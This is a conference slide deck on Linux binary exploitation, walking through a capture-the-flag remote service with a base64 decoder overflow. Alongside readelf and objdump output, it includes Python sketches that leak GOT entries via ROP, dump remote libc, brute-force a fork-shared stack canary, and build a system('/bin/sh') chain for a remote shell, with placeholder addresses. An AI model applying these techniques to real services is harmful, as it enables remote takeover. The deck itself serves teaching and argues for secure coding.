© 2016 Fraunhofer USA, Inc. Center for Experimental Software Engineering
Linux Binary Analysis and Exploitation
Dharma Ganesan, Mikael Lindvall
Context of the slides
• Gave a presentation at the NASA Coding Summit, held at NASA’s IV&V Center
• NASA systems and context are removed from these slides
  • Too sensitive for public release
  • Would increase the risk of attacks on those systems
• Slides are meant to be a teaser on this topic
  • Many low-level, nitty-gritty details are left out
  • Time restriction (the original talk was only 30 min.)
Keywords (used in our exploit)
• Return-Oriented Programming (ROP)
• Address Space Layout Randomization (ASLR)
• Non-Executable Stack (NX)
• Attacking the Global Offset Table (GOT)
• Stealing the remote libc
• Stealing the stack canary
Attack Scenarios and Our Scope
• Scenario 1: Open-source software
  • E.g. Linux, Apache web server, etc.
• Scenario 2: Open binary but closed source
  • E.g. most commercial products
• Scenario 3: Closed binary and closed source
  • E.g. remote services
• Scope of this talk: Scenario 2 (remote exploit)
Questions
• Many modern operating systems (OSes) have built-in security features (more on this later)
• Is it possible to circumvent these security features and take over a remote machine?
• Do we still have to do secure coding even though the OS has security features?
• Let’s investigate these questions for Linux
  • The findings are highly relevant for other OSes too!
Modern OS security features (samples)
• Address Space Layout Randomization (ASLR)
• Non-Executable Stack (NX)
• Stack Canary
ASLR feature for security
• Historically, the memory addresses of variables and functions did not change between runs
  • This made remote code execution easy for hackers
• Address space layout randomization (ASLR) randomizes many items:
  • Addresses of variables differ between runs (e.g. buffer addresses are difficult for hackers to predict)
  • Addresses of shared libraries/DLLs differ between runs (e.g. addresses of library functions are difficult for hackers to predict)
Non-Executable stack (NX) for security
• Historically, hackers sent their exploit code in the user input buffer
  • They then modified the control flow by redirecting execution to that buffer
• A non-executable stack (NX) does not allow code execution on the stack
  • If a hacker stores exploit code (e.g. a virus) on the stack, the OS will not run that code
Stack Canary for security
• Historically, when hackers overflowed a buffer and modified the control flow, the OS was not aware of the attack
• A stack canary (a random key) can detect this issue
  • The random key, generated by the runtime linker, is inserted into the stack to maintain control-flow integrity
  • One cannot overwrite the return addresses stored on the stack without knowing or guessing the canary!
High-level procedure for analysis of binary
• Assumption: The remote service binary is available to the hacker, but the environment is not
• Step 1: Data gathering about the target binary
• Step 2: Analyze the binary for vulnerable library functions and signatures
• Step 3: Reachability analysis of vulnerable library functions
• Step 4: Memory layout analysis of the binary and the remote machine
• Step 5: Stealing the remote’s libc and the stack canary
• Step 6: Construct an evil input that will take over the remote machine
Applying the procedure: An example
• Context: This service is part of an online capture-the-flag challenge (ringzero.com)
• About the remote service (a base64 decoder service):
  • The remote service listens for input on a particular port
  • It outputs the base64 decoding of the given input
  • The binary of the remote service is available for download
  • But the running environment, such as the libc libraries and the OS, is not
  • The binary contains 600 assembly instructions (x86-64)
Applying the procedure: An example
• Challenge: Break into this remote service
  • Perform remote code execution by exploiting vulnerabilities in the binary
  • Steal secrets (i.e. the flag file) from the server by reading the server’s file system
Step 1: Data gathering of the remote service
• Tools: readelf and grep
• What are the OS, machine, and processor type of the remote service?
    dharma@ubuntu:~$ readelf -hn <binary>
    Data:     2's complement, little endian
    OS/ABI:   UNIX - System V
    Machine:  Advanced Micro Devices X86-64
    OS: Linux, ABI: 2.6.24
• Unfortunately, my OS version is different from that of the remote service
  • But we will overcome this problem (discussed later)
• Is the stack executable?
    dharma@ubuntu:~/Downloads$ readelf -lW <binary> | grep GNU_STACK
    Output: GNU_STACK ... RW 0x10
  • RW means the stack is readable and writable but not executable
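The GNU_STACK check can also be scripted. The following is a minimal Python sketch, not the tooling used in the talk: it walks the ELF64 program headers and reports whether the PT_GNU_STACK segment carries the execute flag. The function name stack_is_executable is made up for this illustration, and the code assumes a 64-bit little-endian ELF such as the x86-64 binary above.

```python
import struct

PT_GNU_STACK = 0x6474E551  # program header type that records stack permissions
PF_X = 0x1                 # execute bit in the p_flags field


def stack_is_executable(elf):
    """Inspect a 64-bit little-endian ELF image (bytes).

    Returns True/False from the PT_GNU_STACK flags, or None when the header
    is absent (the effective policy then depends on the kernel and CPU).
    """
    if elf[:4] != b"\x7fELF" or elf[4] != 2 or elf[5] != 1:
        raise ValueError("expected a 64-bit little-endian ELF image")
    # ELF64 header: e_phoff at 0x20, e_phentsize at 0x36, e_phnum at 0x38
    e_phoff = struct.unpack_from("<Q", elf, 0x20)[0]
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 0x36)
    for i in range(e_phnum):
        # Each ELF64 program header starts with p_type (4 bytes), p_flags (4 bytes)
        p_type, p_flags = struct.unpack_from("<II", elf, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            return bool(p_flags & PF_X)
    return None
```

To try it on a downloaded binary, read the file in binary mode and pass the bytes to stack_is_executable; a result of False corresponds to the RW flags shown above.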
Step 1: Data gathering of the remote service
Is there a stack canary that will kick me out if I overflow any buffers?
Tools used: objdump, grep
Dump of assembler code for function doprocessing:
0x0000000000400eaa <+318>: mov -0x8(%rbp),%rax
0x0000000000400eae <+322>: xor %fs:0x28,%rax
0x0000000000400eb7 <+331>: je 0x400ebe <doprocessing+338>
0x0000000000400eb9 <+333>: callq 0x400930 <__stack_chk_fail@plt>
• The stack canary is generated at runtime and kept in thread-local storage, which the code reads through the fs segment register (%fs:0x28)
• Unfortunately, there is a built-in stack integrity check
• __stack_chk_fail will be called if I corrupt the stack
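Spotting this pattern by hand gets tedious on larger binaries. As a rough sketch (assuming AT&T-syntax disassembly text like the listing above, and with find_canary_checks being a name invented for this example), a few lines of Python can flag the instructions that touch the canary slot or call the failure handler:

```python
import re

# The canary slot on x86-64 Linux/glibc and the handler called on mismatch
CANARY_PATTERN = re.compile(r"%fs:0x28|__stack_chk_fail")


def find_canary_checks(disassembly):
    """Return the listing lines that reference the canary or its failure handler."""
    return [line.strip()
            for line in disassembly.splitlines()
            if CANARY_PATTERN.search(line)]


# The epilogue of doprocessing, copied from the slide above
listing = """
0x0000000000400eaa <+318>: mov -0x8(%rbp),%rax
0x0000000000400eae <+322>: xor %fs:0x28,%rax
0x0000000000400eb7 <+331>: je 0x400ebe <doprocessing+338>
0x0000000000400eb9 <+333>: callq 0x400930 <__stack_chk_fail@plt>
"""

hits = find_canary_checks(listing)
for hit in hits:
    print(hit)
```

An empty result for a function suggests, but does not prove, that it was compiled without stack protection.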
Step 2: Analyze the binary for vulnerable library functions?
• Tools used: objdump and grep
• Which external functions are used?
    dharma@ubuntu:~$ objdump -R <binary>
    Output: List of library functions used by the binary
• The hunt for vulnerable functions pointed me to “fork”
  • This function is not used properly (more on this later)
• No strcpy or gets usage (unlucky for the hacker)
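The hunt through the import list can be partly automated. The sketch below is an illustration only: it parses text in the layout that objdump -R prints for x86-64 and flags names on a watch list. The sample records are invented for the example (the offsets are placeholders, not taken from the challenge binary), and the watch list is an assumption, a starting point rather than a complete catalogue.

```python
# Assumption: a small starter watch list; extend it for real audits
WATCH_LIST = {"gets", "strcpy", "strcat", "sprintf", "fork"}


def imported_functions(objdump_r_output):
    """Extract function names from the jump-slot records of `objdump -R` text."""
    names = []
    for line in objdump_r_output.splitlines():
        fields = line.split()
        # Records have three columns: OFFSET, TYPE, VALUE
        if len(fields) == 3 and fields[1].startswith("R_X86_64_JUMP_SLO"):
            # Drop version suffixes such as "@GLIBC_2.2.5" and addends such as "+0x10"
            names.append(fields[2].split("@")[0].split("+")[0])
    return names


# Illustrative input only: placeholder offsets, not real output for the service
SAMPLE = """\
DYNAMIC RELOCATION RECORDS
OFFSET           TYPE              VALUE
0000000000601ff8 R_X86_64_GLOB_DAT  __gmon_start__
0000000000602018 R_X86_64_JUMP_SLOT  write
0000000000602020 R_X86_64_JUMP_SLOT  __stack_chk_fail
0000000000602028 R_X86_64_JUMP_SLOT  read@GLIBC_2.2.5
0000000000602030 R_X86_64_JUMP_SLOT  fork
"""

imports = imported_functions(SAMPLE)
flagged = [name for name in imports if name in WATCH_LIST]
print(flagged)
```

A hit on the watch list is only a lead: whether a function such as fork is actually misused still has to be established by reading the disassembly.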
Step 2: Analyze the binary for vulnerable signatures?
• Is there a function in the given binary that takes two buffers as inputs but does not take the length of each buffer as an argument?
  • If yes, then the service may have memory safety issues
  • It may be possible to overflow a buffer and modify the control flow
• Searching for vulnerable signatures often requires disassembling the binary in order to reconstruct the signature of each function
  • Takes a lot of time and effort
• Found a vulnerable signature: base64_decode(char*, char*);
  • Disassembling the function revealed no bounds checking of buffer sizes
Step 3: Reachability analysis
• How do we reach the vulnerable signature?
  • Answering this question requires reconstructing the call graph from the binary
• For example, in the remote service the vulnerable function base64_decode is called without bounds checking
• Great news for the hacker: a stack-based buffer overflow
Step 3: Reachability analysis: Manually reversed C function from binary (sample)
    void doprocessing()
    {
        char base64Out[0x200];
        char userInput[0x400];

        bzero(base64Out, 0x200);
        bzero(userInput, 0x400);
        write(1, "Please enter your base 64 string: \n", 0x23);
        read(0, userInput, 0x400);
        write(1, "Your message is:\n", 0x11);
        /* base64_decode is not checking the decoded buffer size */
        write(1, base64Out, base64_decode(userInput, base64Out));
        write(1, "\nThank you for using ringzer0 base64 decoder!\n", 0x2e);
    }
• base64_decode can corrupt the return address of doprocessing
• Remote code execution becomes possible if the base64-decoded string exceeds the buffer size
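A quick calculation shows why the reversed function is exploitable. The buffer sizes below come from the reversed source; the helper name max_decoded_len is made up for this sketch, and it assumes standard base64, where every 4 input characters decode to at most 3 bytes.

```python
import base64

USER_INPUT_SIZE = 0x400   # bytes accepted by read(), from the reversed source
BASE64_OUT_SIZE = 0x200   # size of the destination buffer, from the reversed source


def max_decoded_len(encoded_len):
    """Upper bound on decoded size: 4 base64 characters yield at most 3 bytes."""
    return (encoded_len // 4) * 3


worst_case = max_decoded_len(USER_INPUT_SIZE)
overflow = worst_case - BASE64_OUT_SIZE

# A full-length input that decodes to the worst-case number of bytes
payload = base64.b64encode(b"A" * worst_case)

print(hex(worst_case), hex(overflow), len(payload))
```

So a full 0x400-byte input can decode to 0x300 bytes, which is 0x100 bytes more than base64Out can hold. How far past the buffer the saved return address sits depends on the compiler's stack layout and has to be read from the disassembly.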
Step 4: Memory layout analysis
• Finding the vulnerability is a small part of the puzzle
• Exploiting the vulnerability is the tricky part
• We need to understand the memory layout of the remote service from its binary in order to do remote code execution
• Is address space layout randomization (ASLR) turned on in the remote machine?
• To answer this question, we need to find a way to leak memory addresses from the remote machine to our machine
Step 4: Leaking memory addresses of the remote service
• Every dynamically linked Linux binary has a table called the Global Offset Table (GOT)
• The GOT contains pointers to the runtime addresses of library functions
• Goal: Print the GOT entries of the remote service!
• We can modify the control flow of the doprocessing function because of the buffer overflow
• We overwrite the return address of doprocessing with the address of the write function and pass the address of a GOT entry in the appropriate register (rsi)
• This step is performed using return-oriented programming (ROP)
• Running the remote service twice showed different addresses: ASLR is ON, so the remote server is not easy to hack
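To make the leak concrete, here is a minimal Python sketch of how such an input could be laid out. It is not the authors' exploit. Every address, the gadget names, and the distance from the buffer to the canary are placeholders chosen for illustration; the real values must be recovered from the binary. The sketch also assumes the canary is already known (Step 5) and that rdx still holds a usable length when write is reached.

```python
import base64
import struct


def p64(value):
    """Pack an integer as a little-endian 64-bit word, as x86-64 stores it."""
    return struct.pack("<Q", value)


# Hypothetical values, for illustration only
GADGETS = {
    "pop_rdi_ret": 0x401001,          # placeholder: pop %rdi; ret
    "pop_rsi_pop_r15_ret": 0x401003,  # placeholder: pop %rsi; pop %r15; ret
    "write_plt": 0x401010,            # placeholder: PLT stub of write
}
OFFSET_TO_CANARY = 0x208              # placeholder: bytes from buffer start to canary
CANARY = 0x1122334455667700           # placeholder: value recovered in Step 5
GOT_ENTRY = 0x602018                  # placeholder: address of a GOT slot to print


def build_leak_chain(offset_to_canary, canary, got_entry, gadgets):
    """Lay out: filler | canary | saved rbp | ROP chain calling write(1, got_entry, rdx)."""
    chain = b"A" * offset_to_canary
    chain += p64(canary)                       # keep the integrity check happy
    chain += p64(0)                            # saved rbp, unused by this chain
    chain += p64(gadgets["pop_rdi_ret"]) + p64(1)           # rdi = fd 1
    chain += p64(gadgets["pop_rsi_pop_r15_ret"])
    chain += p64(got_entry) + p64(0)           # rsi = GOT entry, r15 = filler
    chain += p64(gadgets["write_plt"])         # overwritten return target ends here
    return chain


chain = build_leak_chain(OFFSET_TO_CANARY, CANARY, GOT_ENTRY, GADGETS)
# The service base64-decodes its input, so the raw bytes are sent encoded
encoded = base64.b64encode(chain)
print(len(chain), len(encoded))
```

The ordering after the filler follows the epilogue shown in Step 1: the canary sits at -0x8(%rbp), so the saved rbp and then the return address come immediately after it.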
Step 5: Stealing the remote’s Libc
• Libc is Turing-complete, meaning we can construct any algorithm from fragments (gadgets) of libc
• Since the remote service is vulnerable to memory errors, we are able to read arbitrary memory of the remote service!
• This vulnerability allowed us to write a program that secretly transfers the remote service’s libc binary
• This solved the problem that the remote server has different runtime versions of libc and GCC
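One plausible way to organize such a transfer is sketched below; the slides do not describe the authors' actual program. The sketch assumes a primitive leak(addr, n) that returns n bytes of remote memory (a hypothetical callable, for example built on the write-based leak from Step 4). It first walks backwards page by page from a leaked libc pointer until it sees the ELF magic bytes, then copies the image in chunks.

```python
PAGE_SIZE = 0x1000
ELF_MAGIC = b"\x7fELF"


def find_elf_base(leak, pointer_into_library, max_pages=0x400):
    """Scan downwards from a leaked pointer for the page that starts with the ELF magic."""
    addr = pointer_into_library & ~(PAGE_SIZE - 1)   # round down to a page boundary
    for _ in range(max_pages):
        if leak(addr, len(ELF_MAGIC)) == ELF_MAGIC:
            return addr
        addr -= PAGE_SIZE
    raise LookupError("ELF header not found within the search window")


def dump_memory(leak, start, size, chunk=0x100):
    """Copy `size` bytes of remote memory starting at `start`, one chunk at a time."""
    image = bytearray()
    addr = start
    while len(image) < size:
        data = leak(addr, min(chunk, size - len(image)))
        if not data:
            raise RuntimeError("leak returned no data at %#x" % addr)
        image += data
        addr += len(data)
    return bytes(image)
```

Against a real service, each call to leak would be one connection that sends a ROP payload and reads the reply. Reading an unmapped page crashes that child process, which a forking server tolerates.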
Step 5: Stealing the stack canary
• The stack canary prevents remote code execution!
• Goal: Steal the stack canary by guessing 1 byte at a time
• Approach: A stack canary is 8 bytes long, so guessing it byte by byte requires at most 8 x 256 = 2048 guesses
• The binary has a fork-based vulnerability, a design flaw
  • The parent remote service spawns a child task using the fork syscall
  • But all child tasks inherit the same stack canary
• Thus, we wrote a program that correctly guesses the stack canary in at most 8 x 256 attempts
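The byte-by-byte search can be sketched in a few lines of Python. This is a local simulation, not the authors' program: child_survives stands in for one connection to the service that overflows exactly up to the guessed byte and observes whether the child finishes normally or is killed by the canary check. Both function names are invented for the example.

```python
import os


def brute_force_canary(child_survives, canary_len=8):
    """Recover the canary one byte at a time.

    child_survives(prefix) is a hypothetical oracle: True when a child whose
    canary bytes were overwritten with `prefix` exits normally.
    """
    known = b""
    attempts = 0
    for _ in range(canary_len):
        for guess in range(256):
            attempts += 1
            if child_survives(known + bytes([guess])):
                known += bytes([guess])   # this byte is right; move to the next
                break
        else:
            raise RuntimeError("no byte value survived; the oracle is unreliable")
    return known, attempts


def make_oracle(secret):
    """Local stand-in for the forking service: every child shares the same secret."""
    def child_survives(prefix):
        return secret.startswith(prefix)
    return child_survives


secret = os.urandom(8)
recovered, attempts = brute_force_canary(make_oracle(secret))
print(recovered == secret, attempts)
```

The search works only because fork copies the parent's canary into every child. A service that re-executes itself for each connection would get a fresh canary each time and defeat this approach.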
Step 6 – Constructing the evil input that spawns a remote shell
• In our case, we want to spawn a remote shell using the vulnerable remote service
  • Using return-oriented programming (ROP), a hacking technique
• We wrote a program that constructs a ROP chain from gadgets in the stolen libc
• We get a backdoor into the remote system!
• Please talk to me for more details (this was only a 30 min. talk)
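As a rough illustration of the final step, the sketch below turns one leaked libc address into the addresses needed for a shell and lays out a short chain that calls system("/bin/sh"). This is a common textbook construction and may differ from what the authors built. All offsets and addresses are placeholders, not values from any real libc; in practice they are looked up in the stolen libc.

```python
import struct


def p64(value):
    """Pack an integer as a little-endian 64-bit word."""
    return struct.pack("<Q", value)


def libc_base(leaked_addr, symbol_offset):
    """ASLR moves the library as a whole, so base = runtime address - file offset."""
    return leaked_addr - symbol_offset


def build_shell_chain(offset_to_canary, canary, pop_rdi_ret, binsh_addr, system_addr):
    """Lay out: filler | canary | saved rbp | pop rdi; ret | "/bin/sh" | system."""
    chain = b"A" * offset_to_canary
    chain += p64(canary)
    chain += p64(0)                                # saved rbp, unused here
    chain += p64(pop_rdi_ret) + p64(binsh_addr)    # rdi = pointer to "/bin/sh"
    chain += p64(system_addr)
    return chain


# Hypothetical numbers for illustration only
LEAKED_WRITE = 0x7F0000001000     # placeholder: runtime address read from the GOT
WRITE_OFFSET = 0x1000             # placeholder: offset of write in the stolen libc
SYSTEM_OFFSET = 0x2000            # placeholder: offset of system
BINSH_OFFSET = 0x3000             # placeholder: offset of the "/bin/sh" string
POP_RDI_RET_OFFSET = 0x4000       # placeholder: offset of a pop %rdi; ret gadget

base = libc_base(LEAKED_WRITE, WRITE_OFFSET)
chain = build_shell_chain(
    offset_to_canary=0x208,                  # placeholder distance to the canary
    canary=0x1122334455667700,               # placeholder canary value
    pop_rdi_ret=base + POP_RDI_RET_OFFSET,
    binsh_addr=base + BINSH_OFFSET,
    system_addr=base + SYSTEM_OFFSET,
)
print(hex(base), len(chain))
```

Depending on the libc build, an extra ret gadget before system may be needed to keep the stack 16-byte aligned. As with the leak, the chain is base64-encoded before it is sent.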
Conclusion
• Memory errors are very dangerous, even if a remote machine runs in a custom-built environment!
  • Hackers can steal, reconstruct, and exploit our environment
• Secure OS features are necessary but not sufficient
  • We were able to defeat ASLR, NX, and stack canaries
• Secure coding is mandatory; the OS cannot always protect us if our code is not secure
• One main security requirement: input validation
  • Extensive off-nominal testing/verification is required!
Future work
• Our binary analysis is semi-manual
• More automation/research is needed for binary reverse engineering
  • Reachability analysis is effort-intensive
  • Generating an evil input that spawns a remote shell is the most challenging part of exploit generation
• We have some ideas for how to do this!
Linux Binary Analysis and Exploitation
Dharma Ganesan, Mikael Lindvall
Fraunhofer Center for Experimental Software Engineering
College Park, Maryland, USA
{dganesan, mlindvall}@fc-md.umd.edu